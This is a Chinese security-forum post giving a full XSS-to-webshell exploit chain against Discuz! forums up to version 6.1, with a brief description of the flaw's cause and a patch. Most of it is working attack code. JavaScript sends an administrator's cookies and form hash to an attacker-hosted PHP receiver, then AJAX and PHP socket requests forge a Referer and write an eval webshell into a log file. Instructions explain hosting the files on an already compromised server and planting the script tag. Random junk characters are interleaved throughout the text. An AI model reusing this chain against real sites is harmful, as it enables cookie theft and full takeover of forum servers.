Discuz XSS得webshell3 c0 b* s1 j; G" \2 n
By racle @tian6.com
+ F, {4 l% B* z* O4 ~8 G9 y1 ?欢迎转帖.但请保留版权信息.
+ F Y& s& S# ]6 A: X受影响版本 iscuz<=6.1.0,gbk+utf+big5
+ x/ ]: z% ]/ Y1 A- V7 _9 Q% R: B8 e( w1 s
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
7 H2 T8 x9 ?) A8 ~2 D! h( R! {: h) i7 q3 m+ v" l) x
4 n8 A* d( l2 k; ~3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
* N9 M/ G5 }" L) N当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
# ]- P. \* g7 ?
# N! t' `) a( F1 M, @6 U分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
/ p7 O9 ~- @' i6 g* @" X本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
9 l. |0 @3 w& ^* I8 d x9 \7 Z0 t* Q$ @" }" U) V
8 |8 ?/ m v. u8 z
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
# B7 M: m+ T( G* `$ K3 L- Y) d, M. D3 `
/ I! q O- F( K1 R0 }
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
7 ?4 H: M# b& G" n, s- Y/ X5 N1 y! h/ l6 T
problem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.( k6 s3 ]: u5 `5 v+ a/ H! [
5 O ~" ~$ F/ {/ S& X/ `
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
2 ?1 F6 t2 b- O0 G% Z
" n1 j; b4 _" i
+ V; @. S- V- a1 E$ f0 c1 R/ Z下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
' D" `+ ^7 S+ a# s$ Q1 \% A# K9 p# l( Z$ U2 m+ X, H
global $runwizardfile, $runwizardhistory;2 i+ O$ B; _% x: @
# L9 F3 ~6 ^8 z" G* h8 Q! t$ Z
$fp = fopen($runwizardfile, 'w');
! d7 m4 A: q, R. A( j1 j" S
2 {5 K8 A4 Z6 m fwrite($fp, serialize($runwizardhistory));9 G: e4 ]0 U0 s6 R+ T
* h% j7 `/ q7 ]; R# o' B
fclose($fp);- ?3 I. D3 O, r$ Q, S
& M& s7 t4 ~& r4 K4 T; X+ s}; L( @; c# A) ?2 h
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.9 [% b- W+ o) {. z$ i8 F% D
以下是修补的办法:function saverunwizardhistory() {
5 n5 D) D) v/ z) @2 J& b6 b
. [/ U3 {: j% i9 t global $runwizardfile, $runwizardhistory;" T* U u5 L1 F2 |- y3 B A
# h0 O" k0 ]3 t* s4 b $fp = fopen($runwizardfile, 'w');0 {! Q# m; D4 T. @* A2 q% R- i
- g" _: C) U: ^/ x! Q* D) n" X4 n
$s = '<?php exit;?>';. Q5 c' z9 Y& J+ p9 e
% |1 J$ |% R; g r R4 ?( g' v7 u2 y( k $s .= serialize($runwizardhistory);
L7 h" {4 L( |, }5 o5 @& A5 X7 `
$ u; Z8 |% v6 A2 e6 ~ fwrite($fp, $s);
4 G/ I1 f6 ?0 o# @ ]
+ H: z1 A1 ?$ `/ ^ fclose($fp);" v7 S- u" z% q! N6 w& w' s
+ k5 E( B% m Z}; D, B4 f8 @: o
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
. }: ^% B3 r9 K3 V$ { f Q/ n2 k x. ~# d; r; v6 r
/ `% w& |# h" u& m4 P0 t4 V6 i- U
* e+ r4 J( N0 ]----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------& ^& e) H* X2 j% M
! U, I1 L3 _) C; l5 V6 l% z& Q d
5 @8 }- q: e# Z- I U+ z" T1 ^ 以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.! a5 q5 {6 p; P+ x- z, W
# ?% k9 ]3 o6 n X4 M& y' T
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL., A7 E( T( m4 E. z7 K9 x# R
! X2 y" i3 \* r- t# m9 O& k, |
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
# D- r7 m$ g& w- B
+ C5 t; y( Z# q4 t* C' U9 H首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
4 U T+ M* F P H% e6 A3 ?# Q; `; w9 t& p
var url="http://目标网站/admincp.php";
; b' A& z; O& E8 F# X
4 B1 q" L% V5 H3 d. x ~4 b/*获得cookies*/% _4 [6 g# I1 w) b+ H, D
; k0 H& Y" h- {& y6 efunction getURL(s) {, |, N* k4 r5 V0 N
) j ]; A/ G" c; w0 H9 I* `var image = new Image();
# z' G1 Q% k+ U) B% D: g; }( w
' s% `& h/ G! m5 w9 k- ^4 q6 h/ Uimage.style.width = 0;6 E- S9 v* i }. ]2 V; I% X, |
4 L3 C4 e0 [3 r' v F# A* s8 oimage.style.height = 0;- h" _8 |- V$ P& s
9 @2 m) R6 }9 E6 @0 R0 P( Yimage.src = s;
% @9 E6 b# J* N7 K- `$ Q- s$ X( A. T% o. Y: `% Z& P; Z* ~+ f5 R
}& z0 ~6 G3 g4 l
! k0 _' G0 l1 X" l' EgetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php8 j$ o; p' \" _ u) s/ Y2 }
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
8 P2 D* W3 E( w! R; \复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) % N& R7 i3 ]8 B1 j/ M
9 y8 F0 Y6 K$ y4 K3 e0 ~6 j0 o$ U" o& u4 h
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";- M; G/ E9 x" A0 |$ g; O
3 d! j$ F* x% O& j& E, k
% y1 W: f0 R& I+ w
9 {: k7 ? v" f, I ^, z w3 m! O( J/*hash*/7 R0 C5 S+ ?9 H- `, d
- _& Q# [' Y( i( k8 f' J
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");- s! I! e3 ?8 p# e9 i
: K3 @: t' p* g: L- v( a. @: ~xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
' Y% a* _ m Z/ d; t" v0 H( H. {7 f3 n
xmlHttpReq.send();& V/ V E1 R; n- o
( r9 g) Q) Z, w/ L+ H* gvar resource = xmlHttpReq.responseText;
5 m8 \# M' {+ b& h `
5 c5 G b9 D# T9 t& E( Jvar numero = resource.search(/formhash/);
/ A! j3 _9 m r7 e% F5 v' f
' l1 ~/ Z6 }6 ]! r* }: xvar formhash=encodeURIComponent(resource.substr(numero+17,8));
0 o+ r" n% j t# {' M/ P$ f) ^3 @" ?- z1 x) J7 I+ r
5 n5 |( ~- O7 }* i4 v9 K
A, o5 c% I6 o7 k& S, tvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 # u6 P. X6 O! M/ ]: G, [6 U/ z
. |8 R6 s$ b* n9 y5 N
xmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
+ y' p3 ^- X( C9 E5 n' s
8 l! m& X6 S- U% j9 E* W9 K0 ExmlHttpReq.setRequestHeader("Referer", url);
# w% I/ a; g" a2 A4 S0 g
7 L+ u3 M. r M/ d+ {xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
4 ]* Z3 G1 B/ X2 O$ [+ L9 J* E5 [- S
xmlHttpReq.setrequestheader("content-length",post.length);
b; \, A! b" @0 `1 m4 @9 G% i2 p
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); ! P8 l. I r t+ X3 T
3 ^+ Q6 D9 I, S" Q7 ZxmlHttpReq.send(post);//发送数据6 R: r" X* z/ i
复制代码这里HASH我假设正确,这样提交,也无须cookies
& d" `& b& X1 B) t8 F1 D+ a3 I& I7 ] i5 A/ f G5 |2 ]
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
6 o- j& K- F* Q1 K0 [# `& b" G
& |* @8 C0 M) ~ `; H# Fif (!$sock) die("$errstr ($errno)\n");
+ x- V6 S, B( Q% T _6 u
6 Z W) I1 \, d7 U$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
& G) l) ] b1 p N" P: K+ S# v2 B) S) V7 i. t( d6 @5 t+ p
& S8 Q! r8 f, Q5 q1 x5 X4 |, W9 C- r$ v. ?5 c5 b2 f9 L! O+ Z3 |
fwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");4 H9 Q# U! ]0 M) \ I0 b
% X$ ]6 t1 V: k% s( |0 K0 m q. x
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
& U0 L! e3 H2 h! b/ y3 e' k" j3 z) B0 {" ]: Y Z* J% ^- F! Y1 b6 h `0 @& a
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");9 {- R, m4 i( X
. Z; e: v! C( q- p6 cfwrite($sock, "Accept-Language: zh-cn\r\n");& J3 Y5 H# l J( X& p" O3 A
4 B) }1 A) f# B, h0 A4 z" Y
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");! X5 ~1 b ~$ b4 e
8 C, c# S h% o/ Y
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");. V. A q+ g f1 i1 g
; `2 g4 d5 O- V5 c+ `5 g
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
8 @! D' ?, ?. V
3 ]& V! a8 U& rfwrite($sock, "Host: $url\r\n");5 c% ^% w: I# A6 a
$ s- e! _9 ^) E+ e3 t
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");5 y7 O6 x6 f0 D; E, k- f% z
) F1 c( E% b6 x" B6 R1 Q8 L& Wfwrite($sock, "Connection: Keep-Alive\r\n");
8 @, M* [0 j: E2 I
1 B @( t3 J7 |. X+ E+ qfwrite($sock, "Cache-Control: no-cache\r\n");' I" R7 Y# |& ^0 R+ a
* t4 ?: y& v, Q+ A9 N
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");
% s$ Z0 O/ Q# [( q
( Y1 _# W( M, u6 e) z2 Q4 Gfwrite($sock, $data);, s% O* v% s5 x: D% v' h
% Q; ?8 }9 g& }4 ]: V& P; }* ^% @) {- r- c9 E2 Z8 c# e
9 B- d! c. S; {$headers = "";
; T0 v! T, X& b. ^0 m( S p' Z# _7 J( m7 a( b6 E
while ($str = trim(fgets($sock, 4096)))
D, k6 k3 M+ V7 q% A, V/ ~: ?8 ]4 q' p7 n; O( b
$headers .= "$str\n";3 h$ Q z+ @! x7 c. {5 D0 Y
! C M, ?1 W( Z5 a6 ^( qecho "\n";
o. \% m& p m* Q
* e T9 j) E2 z" w9 u! Z$body = "";9 c U& j- S! k% U
0 [( A+ e+ ^/ v8 z
while (!feof($sock))8 W2 R7 c- u+ k }0 G' f
9 q+ C5 j1 M8 ]) w: p4 I $body .= fgets($sock, 4096);
' Q% Q0 |+ g5 E3 r7 B+ Y
. o- B4 e7 U0 D% ifclose($sock);
1 h1 q; b8 W) ` F* X4 T. A0 A. T0 o: o1 m) j6 s, Z, ~* x& i- V: G
echo $body;7 R0 L$ D% |# Q( C
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^8 z- `, [! g8 N/ ^7 W8 Q8 w3 Y b
! V8 e: S3 y" K3 v* e, t+ T
: M" I9 w% \7 W" b
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
1 o5 g5 _- U7 p& J0 z
2 W& f: i" C/ `4 b, i) I5 Z8 i8 ]4 N
1 HP SOCKET利用方法首先打开racle.js
@4 q U% `* u4 G+ F0 N
0 c4 q, o8 _( }. @( o+ p' p9 Fvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home0 e( D* Y6 j, ?. B3 X7 x
" ]4 G I% G/ m. F! O$ I8 r% p
- e) o* D+ I1 J7 Y2 e" Y
" L" F% B+ @5 [然后打开racle@tian6.php6 T4 q3 A) J+ d' Y" N% U# L
g6 c: T! d: D! B
$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com
) S: z/ i y$ Q$ y9 l S% H# T7 }/ D. e" n/ [7 D% Z
/ v! V, j* C/ ~
3 U3 a+ q1 s7 h( y如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:8 k# ~' M: O/ F' \+ ?. |7 u* A
: v K$ }( ~2 R3 y' A1 S4 f, A
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));6 R7 E ]/ ^0 [2 O; s
4 w6 c+ c5 u0 ]8 M6 n/ ]4 _" r, m为5 w. t) m7 b* Y) T; I, V0 I$ [
7 R6 q: E- i2 K+ n O( p4 W
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));6 R! X4 @9 y' |8 \0 z. z9 g; @
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
2 K2 E0 a/ m& a7 R4 Q# X" K, x6 c ]6 k) V5 H# o: D! c- w
' R/ {5 f0 F0 R! e( y, H6 H; g H- }: g! t: L$ a
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:- N9 O1 u% i0 B; U0 W; F1 j# L7 l
* |) @; k" Y& M+ K
var formhash=encodeURIComponent(resource.substr(numero+17,8));
* u) p Y) ~7 A; x- }- K0 H7 k/ l* o" @5 }
为
F) E" E1 g% ?! r1 Q9 w, g! M) z1 P* u
var formhash=encodeURIComponent(resource.substr(numero+9,8));
; R- n$ f. C0 O& M$ W7 q% N复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.. t' ~2 T# P4 ~2 K& A' N
- \- w3 \- w3 ^' n/ y4 I如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.# m2 e6 l% u! G5 q# Z% l
4 H/ g9 h b+ z# X1 [9 R如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.9 t- G0 T0 {9 S/ B- U( x
$ z' t; v& n7 |. c
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.. j. v' J Q. m; T9 `1 o4 k# O$ v
% |( K1 i3 X0 w$ W* M
|